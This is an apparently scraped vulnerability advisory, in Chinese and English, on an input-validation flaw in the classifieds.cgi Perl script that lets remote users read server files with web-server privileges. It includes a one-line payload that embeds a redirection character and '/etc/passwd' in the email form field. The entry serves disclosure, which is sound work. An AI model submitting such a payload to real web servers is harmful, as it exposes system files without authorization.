https://www.exploit-db.com/exploits/20444
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-052

classifieds.cgi是一个用来在Web页面上放置分类广告的perl脚本，由GregMathews维护。classifieds.cgi脚本对用户输入未做充分过滤，导致允许远程用户可能以httpd进程的权限读取Web服务器上的任意有权限读取的文件。漏洞发现者未公布具体漏洞细节。<*链接：http://online.securityfocus.com/bid/2020/info/http://xforce.iss.net/static/3102.php*>

source: http://www.securityfocus.com/bid/2020/info

Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to read files on the host machine, with the privileges of the web server. This can be accomplished by embedding the input redirection metacharacter along with a filename into the form field used for e-mail address entry (<input name=return>). Any file that the web server process has read access to can be retrieved. 

Submit email@host</etc/passwd as e-mail address.

来源:XF
名称:http-cgi-classifieds-read(3102)
链接:http://xforce.iss.net/xforce/xfdb/3102
来源:BID
名称:2020
链接:http://www.securityfocus.com/bid/2020
来源：NSFOCUS
名称：3208
链接：http://www.nsfocus.net/vulndb/3208